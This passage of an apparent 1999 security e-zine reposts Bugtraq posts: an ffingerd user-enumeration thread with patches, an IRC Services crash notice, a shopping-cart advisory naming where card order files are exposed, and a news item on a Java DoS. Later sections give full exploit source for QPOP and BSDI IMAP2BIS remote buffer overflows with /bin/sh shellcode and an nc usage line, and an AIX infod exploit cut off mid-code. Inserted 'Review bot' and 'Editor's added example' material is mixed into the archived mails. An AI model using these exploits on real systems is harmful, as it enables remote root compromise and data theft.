       Eilon Gishri                                    eilon@aristo.tau.ac.il
       Security Consultant                             Office: +972-3-6406723
       Israel Inter University Computation Center      Fax:    +972-3-6409118
         /* On a matter of national security */        Home:   +972-3-5078671
       
       
       --- ffingerd.c.old      Thu Feb 18 12:50:36 1999
       +++ ffingerd.c  Fri Apr 23 18:48:54 1999
       @@ -134,7 +134,7 @@
          setgid(pwd->pw_gid);
          setuid(pwd->pw_uid);
          sprintf(filename,"%.200s/.nofinger",pwd->pw_dir);
       -  if (lstat(filename,&stat_buf)) {
       +  if((lstat(filename,&stat_buf) == -1) && (errno == ENOENT)) {
        #ifndef NO_SYSLOG
        #ifdef FASCIST_LOGGING
            char message[512];
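        Review bot: the new condition narrows the "no .nofinger file" case to lstat failing with ENOENT, so every other failure (EACCES on a mode 700 home after the setuid above, ENOTDIR, ELOOP) now falls through to the refusal branch; that is the privacy-preserving default the post argues for, but it should be stated in a comment on the condition and in the documentation, because a broken home (wrong owner, missing directory) will silently make that user unfingerable. errno and ENOENT also need <errno.h>, which this hunk does not show being included; confirm it is already there. Since the refusal branch is where a misconfigured home and a deliberate privacy choice now look alike, logging errno under FASCIST_LOGGING would let the admin tell them apart.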
       @@ -154,7 +154,7 @@
            dump_file(filename,"Public key:","No public key.");
          } else {
            char message[512];
       -    puts("That user does not want to be fingered");
       +    puts("That user does not want to be fingered.");
        #ifndef NO_SYSLOG
            sprintf(message,"attempt to finger \"%.200s\" from %.200s\n",pwd->pw_name,remote);
            syslog(LOG_FACILITY,"%s",message);
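        Review bot: the added full stop makes this message byte-identical to the one printed for a nonexistent user, which is the whole fix for the enumeration oracle, but keeping the same sentence in two places is how the two drifted apart in the first place; define it once as a static const string and use it from both the unknown-user path and this branch. The reviewer check that matters is that nothing else differs between the two paths (an extra line, a different trailing newline, an early return before this puts), since any such difference re-opens the oracle. The sprintf into message[512] below is bounded by the two %.200s limits, so that line is fine.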
       
       ------------------------------------------------------------------------------
       
       Date: Fri, 23 Apr 1999 19:43:33 +0200
       From: Felix von Leitner <leitner-bugtraq@MATH.FU-BERLIN.DE>
       To: BUGTRAQ@netspace.org
       Subject: Re: Ffingerd privacy issues
       
       Thus spake Eilon Gishri (eilon@aristo.tau.ac.il):
       >   I found a couple of bugs in ffingerd 1.19 which are related to
       > privacy.
       
       OK.  I would be happy if you email me (the author) first before
       publishing this on bugtraq.  Next time, maybe.
       
       [ffingerd assumes the user wants to be fingered if his home does not
       give public execute access]
       
       This is documented in ffingerd.  If you want ffingerd to look into
       protected homes, run it as root.
       
       > -----
       > (aristo)/cc/eilon>finger root@host.domain
       > [host.domain]
       > That user does not want to be fingered
       > -----
       
       > Hmmm, now for an unknown user.
       
       > -----
       > (aristo)/cc/eilon>finger root1@host.domain
       > [host.domain]
       > That user does not want to be fingered.
       > -----
       
       > Oops. Notice the dot ('.') at the end of the sentence. A very simple
       > and efficient way to find whether the user exists on the remote host
       > or not (taking into account the fact that ffingerd has been installed
       > on the remote host).
       
       This has been pointed out to me yesterday.  I fixed it today (before I
       saw this message, by the way), and announced version 1.20 on Freshmeat
       pointing out this fixed problem.  Did you see my announcement and then
       posted to bugtraq?
       
       > --- ffingerd.c.old    Thu Feb 18 12:50:36 1999
       > +++ ffingerd.c        Fri Apr 23 18:48:54 1999
       > @@ -134,7 +134,7 @@
       >    setgid(pwd->pw_gid);
       >    setuid(pwd->pw_uid);
       >    sprintf(filename,"%.200s/.nofinger",pwd->pw_dir);
       > -  if (lstat(filename,&stat_buf)) {
       > +  if((lstat(filename,&stat_buf) == -1) && (errno == ENOENT)) {
       >  #ifndef NO_SYSLOG
       >  #ifdef FASCIST_LOGGING
       >      char message[512];
       
       This is debatable.
       If a user wants privacy, he should remove the world readable permission,
       not the world executable permission.
       
        I will not add this right now but think it over.  If anyone wants to
        comment on the way to go here, feel free to email me.  I would prefer
        discussing this in private email rather than on bugtraq, but if you must, I
        will also read bugtraq comments.
       
       > @@ -154,7 +154,7 @@
       >      dump_file(filename,"Public key:","No public key.");
       >    } else {
       >      char message[512];
       > -    puts("That user does not want to be fingered");
       > +    puts("That user does not want to be fingered.");
       >  #ifndef NO_SYSLOG
       >      sprintf(message,"attempt to finger \"%.200s\" from %.200s\n",pwd->pw_name,remote);
       >      syslog(LOG_FACILITY,"%s",message);
       
       This has already been fixed.
       
       Felix
       
       ------------------------------------------------------------------------------
       
       Date: Fri, 23 Apr 1999 22:00:08 +0300
       From: Eilon Gishri <eilon@ARISTO.TAU.AC.IL>
       To: BUGTRAQ@netspace.org
       Subject: Re: Ffingerd privacy issues
       
       On Fri, Apr 23, 1999 at 07:43:33PM +0200, Felix von Leitner wrote:
       > Thus spake Eilon Gishri (eilon@aristo.tau.ac.il):
       > >   I found a couple of bugs in ffingerd 1.19 which are related to
       > > privacy.
       >
       > OK.  I would be happy if you email me (the author) first before
       > publishing this on bugtraq.  Next time, maybe.
       
       I've e-mailed you and Cc-ed BugTraq. As my email includes a fix (A
       very complicated one I must say :)) I also notified the list. I'm
       not sure I would have done the same if I couldn't fix it myself.
       
       > [ffingerd assumes the user wants to be fingered if his home does not
       > give public execute access]
       
        Huh, it's opened if it's closed?
       
       > This is documented in ffingerd.  If you want ffingerd to look into
       > protected homes, run it as root.
       
       I want the machine itself to be protected and not only the users home
       directory. I consider it a feature when I don't have to run fingerd
       as root. Please don't consider it as a flame, I do like this utility
       and am using it.
       
       > > -----
       > > (aristo)/cc/eilon>finger root@host.domain
       > > [host.domain]
       > > That user does not want to be fingered
       > > -----
       >
       > > Hmmm, now for an unknown user.
       >
       > > -----
       > > (aristo)/cc/eilon>finger root1@host.domain
       > > [host.domain]
       > > That user does not want to be fingered.
       > > -----
       >
       > > Oops. Notice the dot ('.') at the end of the sentence. A very simple
       > > and efficient way to find whether the user exists on the remote host
       > > or not (taking into account the fact that ffingerd has been installed
       > > on the remote host).
       >
       > This has been pointed out to me yesterday.  I fixed it today (before I
       > saw this message, by the way), and announced version 1.20 on Freshmeat
       > pointing out this fixed problem.  Did you see my announcement and then
       > posted to bugtraq?
       
        Nope. I was playing with it on a machine on which I would like to see all
        fingers which are done to it without giving away any "free" information.
       
       > This is debatable.
       > If a user wants privacy, he should remove the world readable permission,
       > not the world executable permission.
       
       I disagree.
       
       > I will not add this right now but think it over.  If anyone wants to
       > comment on the way to go here, feel free to email me.  I would prefer
       > discussion this in private email than on bugtraq, but if you must, I
       > will also read bugtraq comments.
       
       
       
       --
       Eilon Gishri                                    eilon@aristo.tau.ac.il
       Security Consultant                             Office: +972-3-6406723
       Israel Inter University Computation Center      Fax:    +972-3-6409118
         /* On a matter of national security */        Home:   +972-3-5078671
       
       ------------------------------------------------------------------------------
       
       Date: Fri, 23 Apr 1999 15:46:59 -0500
       From: Dagmar d'Surreal <dagmar@EDGE.NET>
       To: BUGTRAQ@netspace.org
       Subject: Re: Ffingerd privacy issues
       
        As to the matter of the home directories being
        world-readable/executable...
        
        Having the finger daemon assume that there is no .nofinger file because
        the home directory in question is not readable, but still executable,
        breaks a few things.  On multi-user machines, some users will be extremely
        paranoid, and will not wish to use anything BUT mode 700, because having
        the directory world-executable will allow other users on the system to
        detect the presence of certain files in their directory (like .rhosts,
        .forward, .promcail, .pinerc) that may allow them to launch attacks at
        that particular user, knowing that there's a good chance that the user
        uses a vulnerable package, and quite possibly even the last time they used
        it depending on the file.
       
       After seeing the post on freshmeat, it occurred to me that I had forgotten
       to email Felix the patch for 1.18 that took care of the punctuation as
       well as a few other issues, and I now notice that I sent him the wrong
       version of the patch this morning anyway.  (A version which did not have
       the directory mode issue fixed, but at least my binary has been working
       all this time thankfully.)  Eilon Gishri dealt with it a lot more
       elegantly than I did anyway.  ;)
       
        Attached is a patch which applies to the 1.20 version of Fefe's Finger
        Daemon, which includes both Eilon Gishri's patches to deal with paranoid
        users whose home directories are mode 700 (the punctuation problem had
        already been fixed in 1.20), and my misdirection patches that
        add the .fakefinger file (lets users control exactly what will be returned
        when they are fingered), and the /etc/ffingerd.empty and
        /etc/ffingerd.indirect files which allow a sysadmin to change what kind of
        message is sent to people when they try indirect or empty finger queries
        without having to edit the source and recompile the daemon.
       
       ----------
       Unsolicited commercial email sent to this address will be forwarded to
       uce@ftc.gov, or responded to late in the evening after I've been clubbing
       long enough to be fairly drunk, and at least twice as verbally abusive.
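
        Editor's added example, not ffingerd code and not Dagmar's or Eilon
        Gishri's patch: how a finger daemon can decide whether to answer for a
        user and fail closed when it cannot look inside the home directory,
        rather than reading "unreadable" as "no .nofinger". The policy names,
        the 4096-byte path buffer and the self-test's constructed directories
        under /tmp are this example's own assumptions; it assumes the daemon
        runs unprivileged, so a mode-700 home owned by someone else is not
        searchable.

```c
/* Added example (not ffingerd code): decide whether a finger query for a user
 * may be answered, failing closed when the home directory cannot be inspected. */
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

enum finger_policy {
    FINGER_ALLOW,            /* home readable, no .nofinger present */
    FINGER_DENY_NOFINGER,    /* user opted out explicitly */
    FINGER_DENY_UNREADABLE   /* cannot tell, so do not answer */
};

/* Assumes the caller runs with the daemon's unprivileged credentials, so a
 * mode-700 home directory belonging to someone else is not searchable. */
enum finger_policy finger_decide(const char *home)
{
    char path[4096];
    struct stat st;

    /* A directory we cannot read or search gives no evidence either way about
     * .nofinger; treating that as "no opt-out" is the bug discussed above. */
    if (access(home, R_OK | X_OK) != 0)
        return FINGER_DENY_UNREADABLE;

    if (snprintf(path, sizeof path, "%s/.nofinger", home) >= (int)sizeof path)
        return FINGER_DENY_UNREADABLE;      /* path truncated: fail closed */

    if (stat(path, &st) == 0)
        return FINGER_DENY_NOFINGER;
    if (errno == ENOENT)
        return FINGER_ALLOW;
    return FINGER_DENY_UNREADABLE;          /* EACCES or anything unexpected */
}

/* Self-test on constructed home directories under a temporary directory:
 * one open, one with .nofinger, one locked down to mode 000 (what another
 * user's mode-700 home looks like to us). Returns 1 when every decision is
 * as expected, 0 otherwise. */
int finger_selftest(void)
{
    char base[] = "/tmp/fingerXXXXXX";
    char open_home[64], optout_home[64], locked_home[64], marker[96];
    FILE *f;
    int ok = 1;

    if (mkdtemp(base) == NULL)
        return 0;
    snprintf(open_home,   sizeof open_home,   "%s/open",   base);
    snprintf(optout_home, sizeof optout_home, "%s/optout", base);
    snprintf(locked_home, sizeof locked_home, "%s/locked", base);
    snprintf(marker,      sizeof marker,      "%s/.nofinger", optout_home);

    if (mkdir(open_home, 0755) || mkdir(optout_home, 0755) || mkdir(locked_home, 0700))
        return 0;
    if ((f = fopen(marker, "w")) == NULL)
        return 0;
    fclose(f);
    chmod(locked_home, 0);

    ok = ok && finger_decide(open_home)   == FINGER_ALLOW;
    ok = ok && finger_decide(optout_home) == FINGER_DENY_NOFINGER;
    /* root ignores mode bits, so the locked case only means something unprivileged */
    if (geteuid() != 0)
        ok = ok && finger_decide(locked_home) == FINGER_DENY_UNREADABLE;

    chmod(locked_home, 0700);
    unlink(marker);
    rmdir(open_home); rmdir(optout_home); rmdir(locked_home); rmdir(base);
    return ok;
}

int main(void)
{
    printf("finger policy self-test: %s\n", finger_selftest() ? "ok" : "FAILED");
    return 0;
}
```

        The point of the three-way result is that "unreadable" is its own
        answer: the daemon can log it and send the same neutral reply it
        would send for an opted-out user, so a mode-700 home leaks nothing
        about whether the user exists or has chosen .nofinger.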
       
       @HWA       
       
 22.0  DoS in IRC services
       ~~~~~~~~~~~~~~~~~~~
       
       Date: Thu, 22 Apr 1999 22:53:42 EDT
       From: Andy Church <achurch@DRAGONFIRE.NET>
       To: BUGTRAQ@netspace.org
       Subject: Bug in Services for IRC Networks 4.2.2
       
            A bug has been found in versions through 4.2.2 of Services for IRC
       Networks which allows any IRC user to crash the program.  The channel
       service's SET SUCCESSOR command does not properly handle the case of no
       parameters, and generates a segmentation fault attempting to access
       address zero.  This bug is believed to be present in all versions since
       the SET SUCCESSOR command was introduced (in version 4.1.0).
       
            A new version, 4.2.3, has been released which fixes this bug.  Users
       of prior versions of Services should upgrade immediately.
       
            Services updates are always announced on the Services mailing list;
       see http://achurch.dragonfire.net/services/about.html for information on
       subscribing to the list.
       
         --Andy Church
           achurch@dragonfire.net
           http://achurch.dragonfire.net/
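
        Editor's added example, not code from Services for IRC Networks: a
        SET SUCCESSOR handler that checks how many parameters it actually got
        before touching any of them, which is the class of defect Andy
        describes (a missing argument left as a NULL pointer and then
        dereferenced). The command syntax, the reply strings and the 8-slot
        parameter limit are this example's own assumptions.

```c
/* Added example (not Services code): a SET SUCCESSOR handler that checks the
 * parameter count before touching any parameter pointer. */
#include <stdio.h>
#include <string.h>

#define MAX_PARAMS 8

/* Split a command line on spaces, in place, into at most max tokens and
 * NULL-fill the unused slots. Returns the number of tokens found. A handler
 * that reads a slot beyond the count sees NULL, exactly the address-zero
 * fault described above, so the count is the only safe guide. */
static int split_params(char *line, char **argv, int max)
{
    int argc = 0;
    char *p = line;

    while (argc < max) {
        while (*p == ' ' || *p == '\r' || *p == '\n')
            *p++ = '\0';
        if (*p == '\0')
            break;
        argv[argc++] = p;
        while (*p != '\0' && *p != ' ' && *p != '\r' && *p != '\n')
            p++;
    }
    for (int i = argc; i < max; i++)
        argv[i] = NULL;
    return argc;
}

/* Handle "SET <channel> SUCCESSOR <nick>". Writes a reply into out and returns
 * 0 on success or -1 if the request is malformed. The argc < 4 branch is the
 * missing-parameter case: argv[3] is NULL there and must not be used. */
int handle_set_successor(const char *request, char *out, size_t outlen)
{
    char line[512];
    char *argv[MAX_PARAMS];
    int argc;

    if (strlen(request) >= sizeof line) {
        snprintf(out, outlen, "Request too long");
        return -1;
    }
    strcpy(line, request);
    argc = split_params(line, argv, MAX_PARAMS);

    if (argc < 3 || strcmp(argv[0], "SET") != 0 || strcmp(argv[2], "SUCCESSOR") != 0) {
        snprintf(out, outlen, "Syntax: SET channel SUCCESSOR nick");
        return -1;
    }
    if (argc < 4) {
        snprintf(out, outlen, "SUCCESSOR requires a nick parameter");
        return -1;
    }
    snprintf(out, outlen, "Successor for %s set to %s", argv[1], argv[3]);
    return 0;
}

/* Self-test with constructed requests; returns 1 if all behave as intended. */
int successor_selftest(void)
{
    char out[128];
    int ok = 1;

    ok = ok && handle_set_successor("SET #chan SUCCESSOR bob", out, sizeof out) == 0
            && strcmp(out, "Successor for #chan set to bob") == 0;
    ok = ok && handle_set_successor("SET #chan SUCCESSOR\r\n", out, sizeof out) == -1;
    ok = ok && handle_set_successor("SET #chan", out, sizeof out) == -1;
    ok = ok && handle_set_successor("DROP #chan SUCCESSOR bob", out, sizeof out) == -1;
    return ok;
}
```

        Keeping the tokenizer's unused slots NULL, instead of leaving stale
        pointers in them, is deliberate: a forgotten check then fails loudly
        in testing rather than reading whatever was on the stack.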
       
       @HWA       
       
       
 23.0  The big e-commerce crunch. Several web shopping carts are still wide open;
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       Date: Thu, 22 Apr 1999 13:09:32 -0400
       From: Elaich Of Hhp <hhp@NS.SUSPEND.NET>
       To: BUGTRAQ@netspace.org
       Subject: WebShop advisory.
       
                        (hhp) WebShop advisory. (hhp)
       ---------------------------------------------------------------------
        Alright, to my knowledge, there is another dangerous shop service
        if installed the right way.  I contacted the vendor and notified
        the admin of the problem.  I have the feeling this isn't all though.
        I'm almost positive there are more dangerous shopping services out
        there that will be found very soon after all these posts get noticed.
        So for now I will look around, please don't flood my email and I'll
        repost if I find anything else.
        
        Please remember this does not mean there is a flaw in the service
        unless by default this is left readable on a clean installation
        with no configuration files to modify the permissions. Also PGP
        options would eliminate most of the problems.
       
       Also  please  note  I  did not install this software, the info I have
       gathered  was  on  the website and the vulnerable site was found by a
       search engine.
       
       Info:
       
       WebShop via http://www.inetlab.com/products.html
         Platforms: Windows 95/98/NT on Intel
                    Linux on Intel or Sparc
                    Solaris on Intel or Sparc
                    FreeBSD 2.2 or smaller on Intel
                    FreeBSD 3.0 on Intel
                    BSDI/OS on Intel............... (Found vuln server.)
                    Silicon Graphics Irix on MIPS.. (Found vuln server.)
         Executable: WebShop.cgi
         Exposed Directory: WebShop or webshop
         Exposed Order info: WebShop/templates/cc.txt
                             and or WebShop/logs/cc.txt and ck.log
         Status: Free?, resale=$50?.
         Number of exposed installs found: 2+
         PGP Option available?: Unknown.
       
       elaich - 4:16:15CST 4/22/1999
       --------------------------------------------
       elaich of the hhp.
       Email: hhp@hhp.hemp.net / pigspigs@yahoo.com
       Voice: 1800-Rag-on-gH pin: The-hhp-crew
       Web: http://hhp.hemp.net
       --------------------------------------------
       
       @HWA
       
 24.0  New Java bug unveils new Win9x DoS
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       Contributed by Astral http://www.403-security.com/
       
       http://www.news.com/News/Item/0,4,35760,00.html
       
       Java bug crashes Windows 95, 98 
       By Stephen Shankland
       Staff Writer, CNET News.com 
       April 27, 1999, 5:30 p.m. PT 
       URL: http://www.news.com/News/Item/0,4,35760,00.html 
       
       A college student has found a glitch that enables a malicious Java program to crash Windows 95- or 
       98-based computers.
       
       The bug uses Java to take advantage of a long-standing problem with Microsoft's Windows 95 and 
       Windows 98 operating systems, according to Joseph Ashwood, a computer research undergraduate student
       at the University of Southern California. Specifically, it creates more and more computing processes, 
       called "threads," until the system runs out of resources.
       
       "It generates so many threads that the system loses all control over itself," Ashwood said.
       
       Such a malicious Java program could be embedded on a Web page, according to Ashwood, who said he came
       across the bug when he was looking at the Java source code for a computer security class.
       
       Sun and Microsoft acknowledged the problem, but said that "denial of service" attacks such as Ashwood's
       thread-overrun program are common and that protecting against them is difficult.
       
       The Java thread-overrun program is interesting in light of the fact that the malicious program crashes 
       Windows 95 and 98 computers without ever leaving the Java "sandbox" that's designed to curtail Java 
       programs so they can't wreak havoc on an operating system. More robust operating systems such as Windows 
       NT or Sun's Solaris aren't troubled by the bug.
       
       A Microsoft spokesperson said the company is considering addressing the threading weakness, but that
       the problem is deeply buried in the operating system architecture and that modifying the relevant code 
       would require "a major overhaul." Indeed, one of the reasons for developing Windows NT was because of the
       need for a more robust threading architecture, the spokesperson said.
       
       Microsoft also encouraged users to be careful which Web sites they visit and what software they download.
       
       The malicious program has crashed Windows 95 and Windows 98 systems with both Microsoft's Internet 
       Explorer and Netscape Navigator Web browsers, Ashwood said. In some circumstances, Navigator crashes but
       the system doesn't, he said.
       
        Ashwood discovered the bug while looking at previous versions of Java, but he's found that it operates with
        the most recent version as well.
       
       In his tests, Ashwood has found that Windows NT performance degrades and the browser stops responding. 
       On Unix systems, the browser hangs up, he said.
       
       From a programming point of view, it's difficult to fix a problem like this one, which takes advantage 
       of the overuse of an ordinary activity such as generating a new thread, said Roland Jones, senior product
       manager for Java security.
       
       "What's doing this is a normal operation taken to excess. It's really hard to tell what's normal and 
       what's excessive," Jones said.
       
       Creating threads is as basic to computers as eating is to people, but in this case, "The waitress can't
       tell that this guy has ordered 47 steaks already."
       
       Ashwood contended "it should be rather simple for either Microsoft or Sun to fix it" by counting and 
       limiting the threads. He added that it would be most logical for Microsoft to fix it, because the thread 
       issue is a vulnerability that's not limited just to Java.
       
       The Java-based thread-overrun program runs inside the Java virtual machine, the software component that
       lets programs written in Java execute on all sorts of different chips.
       
       The thread overrun issue "could be addressed in the virtual machine. We have some thoughts about what
       we can do. But we haven't had that much trouble with it," Jones said. "It's one of the things that's been
       on our list to look at."
       
        "The better operating system should be able to handle this," he added.
       
       Ashwood said he notified Sun about the exploit in September, October, and November, and was dissatisfied
       with the company's responses. Last week, he described the bug on the Alienware Web site.
       
       @HWA       
       
  25.0  QPOP (version 2.4b2) _demonstration_ REMOTE exploit for FreeBSD 2.2.5 and BSDi 2.1      
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
       
       /*
        * QPOP (version 2.4b2) _demonstration_ REMOTE exploit for FreeBSD 2.2.5.
        * and BSDi 2.1
        * 24-Jun-1998 by stran9er
        *
        * Based:
        *         FreeBSD/BSDi shellcode from some bsd_lpr_exploit.c by unknown author.
        *         x86 decode.bin/encode.c by Solar Designer.
        *
        * Disclaimer:
        *         this demonstration code is for educational purposes only! DO NOT USE!
        */
       
       #include <stdio.h>
       #include <stdlib.h>
       #include <string.h>
       
       #define ESP 0xefbfd480
       #define BMW 750
       
       main(int argc, char **argv)
       {
          int i,t,offset = 500;
          char buf[1012];
          char nop[] = "\x91\x92\x93\x94\x95\x96\x97\xF8\xF9\xFC\xFD";
          char decode_x86[] =
             "\x68\x5D\x5E\xFF\xD5\xFF\xD4\xFF\xF5\x8B\xF5\x90\x66\x31\x7D\x30"
             "\x33\x7D\x30\x90\x90\x8B\xC7\x66\x2D\x5D\x5D\xD5\x21\x8B\xFD\x83"
             "\xC7\x02\x8B\xEF\x90\x90\x90\x8A\xE0\x8B\xFE\x83\xC6\x01\x32\x67"
             "\x30\x30\x67\x30\x90\x75\xD5";/*\x79\x5F\x7D\x60\x5D\x63\x70\x5E"*/
          char shellcode_BSDi[] =
             "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
             "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
             "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
             "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
          
          fprintf(stderr, "QPOP (FreeBSD v 2.4b2) remote exploit by stran9er. - DO NOT USE! -\n");
          if (argc>1) offset = atoi(argv[1]);
          fprintf (stderr,"Using offset %d (esp==0x%x)",offset,ESP);
          offset+=ESP;
          fprintf (stderr," esp+offset=0x%x\n\n",offset);
          for(i=0;i<sizeof(buf);i++) buf[i]=nop[random()%strlen(nop)];
       // memset(buf, 0x90, sizeof(buf));
          buf[sizeof(buf)-1]=0;
          for(i=0;i < (sizeof(decode_x86)-1);i++) buf[i+BMW] = decode_x86[i];
          for(t=0;t < sizeof(shellcode_BSDi);t++) {
           buf[t*2+i+BMW+0] = (unsigned char)shellcode_BSDi[t] % 0x21 + 0x5D;
           buf[t*2+i+BMW+1] = (unsigned char)shellcode_BSDi[t] / 0x21 + 0x5D;
          }
          buf[1008] = (offset & 0xff000000) >> 24;
          buf[1007] = (offset & 0x00ff0000) >> 16;
          buf[1006] = (offset & 0x0000ff00) >> 8;
          buf[1005] = (offset & 0x000000ff);
          printf("%s\n",buf);
       }
       /* -- CONFIDENTIAL -- */

       
       
       @HWA
       
 26.0  BSDI IMAP2BIS remote root exploit
       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
       /*

         BSDI IMAP2BIS remote root exploit
       
         Usage:   (./imapx <offset>;cat)| nc targethost 143
                  
                    where offset = -1000..1000  (brute force if 0 doesnt work) 
       
         Note:
                 if you plan to port this to other OS., make sure the
                 shellcode doesn't contain lower case chars since imapd
                 will toupper() the shellcode, thus fucking it up.
         Note:
                 I tested this on a few system's and found this offsets vulnerable
       
       */
       
       #include <stdio.h>
       #include <stdlib.h>
       #include <limits.h>
       #include <string.h>
       
       #define BUFLEN 4092
       #define NOP 0x90
       
       char shell[] =
        
          "\xeb\x58\x5e"
           "\x31\xdb\x83\xc3\x08\x83\xc3\x02\x88\x5e\x26"
           "\x31\xdb\x83\xc3\x23\x83\xc3\x23\x88\x5e\xa8"
           "\x31\xdb\x83\xc3\x26\x83\xc3\x30\x88\x5e\xc2"
           "\x31\xc0\x88\x46\x0b\x89\xf3\x83\xc0\x05\x31"
           "\xc9\x83\xc1\x01\x31\xd2\xcd\x80\x89\xc3\x31"
           "\xc0\x83\xc0\x04\x31\xd2\x88\x56\x27\x89\xf1"
           "\x83\xc1\x0c\x83\xc2\x1b\xcd\x80\x31\xc0\x83"
           "\xc0\x06\xcd\x80\x31\xc0\x83\xc0\x01\xcd\x80"
           "\x42\x49\x4e\x2f\x53\x48\x00";
       
       void
       main (int argc, char *argv[])
       {
         char buf[BUFLEN];
         int offset,nop,i;
         unsigned long esp; 
         char shell[1024+300];
       
         fprintf(stderr,"usage: %s <offset>\n", argv[0]);
       
         nop = 403;
         esp = 0xefbfd5e8;
         offset = atoi(argv[1]);
         
         memset(buf, NOP, BUFLEN);
         memcpy(buf+(long)nop, shell, strlen(shell));
         
         for (i = 1024; i < BUFLEN - 3; i += 2)
       {    *((int *) &buf[i]) = esp + (long) offset;
            shell[ sizeof(shell)-1 ] = 0;
       } 
        
        printf("{%d} AUTH\r\n", BUFLEN);
         for (i = 0; i < BUFLEN; i++)
           putchar(buf[i]);
         
         printf("\r\n");
       
         return;
       }
       
       @HWA       
       
 27.0  Infod AIX exploit
       ~~~~~~~~~~~~~~~~~
       
       /* Infod AIX exploit (k) Arisme 21/11/98  - All Rights Reversed 
          Based on RSI.0011.11-09-98.AIX.INFOD (http://www.repsec.co
       
          Run program with the login you want to exploit :)
          When the window appears, select "options", "defaults", change printer 
          to something more useful (like /bin/x11/xterm) and print !                
       
          Comments,questions : arisme@altern.org */
       
       
       #include <sys/types.h>
       #include <sys/socket.h>
       #include <sys/un.h>
       #include <netdb.h>
       #include <stdio.h>
       #include <stdlib.h>
       #include <pwd.h>
       
       #define TAILLE_BUFFER 2000
       #define SOCK_PATH "/tmp/.info-help"
       #define PWD "/tmp"
       
       #define KOPY "Infod AIX exploit (k) Arisme 21/11/98\nAdvisory RSI.0011.11-09-98.AIX.INFOD (http://www.repsec.com)"
       #define NOUSER "Use : infofun [login]"
       #define UNKNOWN "User does not exist !"
       #define OK "Waiting for magic window ... if you have problems check the xhost "
       
       void send_environ(char *var,FILE *param)
       { char tempo[TAILLE_BUFFER];
         int taille;
         
         taille=strlen(var);
         sprintf(tempo,"%c%s%c%c%c",taille,var,0,0,0);
         fwrite(tempo,1,taille+4,param);
       }
       
       main(int argc,char** argv)
       { struct sockaddr_un sin,expediteur;
         struct hostent *hp;
         struct passwd *info;
         int chaussette,taille_expediteur,port,taille_struct,taille_param;
         char buffer[TAILLE_BUFFER],paramz[TAILLE_BUFFER],*disp,*pointeur;
         FILE *param;
         
         char *HOME,*LOGIN;
         int UID,GID;
         
         printf("\n\n%s\n\n",KOPY);
         
         if (argc!=2) { printf("%s\n",NOUSER);
                        exit(1); }
                        
                        
         info=getpwnam(argv[1]);
         if (!info)   { printf("%s\n",UNKNOWN);
                        exit(1); }
         
         HOME=info->pw_dir;
         LOGIN=info->pw_name;
         UID=info->pw_uid;
         GID=info->pw_gid;
         
         param=fopen("/tmp/tempo.fun","wb");
         
         chaussette=socket(AF_UNIX,SOCK_STREAM,0);
         sin.sun_family=AF_UNIX;
         strcpy(sin.sun_path,SOCK_PATH);
         taille_struct=sizeof(struct sockaddr_un);
         
         
         if (connect(chaussette,(struct sockaddr*)&sin,taille_struct)<0)
            { perror("connect"); 
              exit(1); }   
          
              
         /* 0 0 PF_UID pf_UID 0 0 */
         
         sprintf(buffer,"%c%c%c%c%c%c",0,0,UID>>8,UID-((UID>>8)*256),0,0);
         fwrite(buffer,1,6,param);
         
         /* PF_GID pf_GID */
         sprintf(buffer,"%c%c",GID>>8,GID-((GID>>8)*256));
         fwrite(buffer,1,2,param);
         
         /* DISPLAY (259) */
         
         bzero(buffer,TAILLE_BUFFER); 
         strcpy(buffer,getenv("DISPLAY"));
         fwrite(buffer,1,259,param);
         
         /* LANG (1 C 0 0 0 0 0 0 0) */
         
         sprintf(buffer,"%c%c%c%c%c%c%c%c%c",1,67,0,0,0,0,0,0,0);
         fwrite(buffer,1,9,param);
         
         /* size_$HOME $HOME 0 0 0 */
         
         send_environ(HOME,param);
         
         /* size_$LOGNAME $LOGNAME 0 0 0 */
         
         send_environ(LOGIN,param);
         
         /* size_$USERNAME $USERNAME 0 0 0 */
         
         send_environ(LOGIN,param);
         
         /* size_$PWD $PWD 0 0 0 */
         
         send_environ(PWD,param);
         
         /* size_DISPLAY DISPLAY 0 0 0 */
         
         //send_environ(ptsname(0),param);
         
         /* If we send our pts, info_gr will crash as it has already changed UID */
         
         send_environ("/dev/null",param);
         
         /* It's probably not useful to copy all these environment vars but it was
            good for debugging :) */
         
         sprintf(buffer,"%c%c%c%c",23,0,0,0);
         fwrite(buffer,1,4,param);
         
         sprintf(buffer,"_=./startinfo");
         send_environ(buffer,param);
         
         sprintf(buffer,"TMPDIR=/tmp");
         send_environ(buffer,param);
         
         sprintf(buffer,"LANG=%s",getenv("LANG"));
         send_environ(buffer,param);
         
         sprintf(buffer,"LOGIN=%s",LOGIN);
         send_environ(buffer,param);
         
         sprintf(buffer,"NLSPATH=%s",getenv("NLSPATH"));
         send_environ(buffer,param);
         
         sprintf(buffer,"PATH=%s",getenv("PATH"));
         send_environ(buffer,param);
         
         sprintf(buffer,"%s","EDITOR=emacs");
         send_environ(buffer,param);
         
         sprintf(buffer,"LOGNAME=%s",LOGIN);
         send_environ(buffer,param);
         
         sprintf(buffer,"MAIL=/usr/spool/mail/%s",LOGIN);
         send_environ(buffer,param);
         
         sprintf(buffer,"HOSTNAME=%s",getenv("HOSTNAME"));
         send_environ(buffer,param);
         
         sprintf(buffer,"LOCPATH=%s",getenv("LOCPATH"));
         send_environ(buffer,param);
         
         sprintf(buffer,"%s","PS1=(exploited !) ");
         send_environ(buffer,param);
         
         sprintf(buffer,"USER=%s",LOGIN);
         send_environ(buffer,param);
         
         sprintf(buffer,"AUTHSTATE=%s",getenv("AUTHSTATE"));
         send_environ(buffer,param);
         
         sprintf(buffer,"DISPLAY=%s",getenv("DISPLAY"));
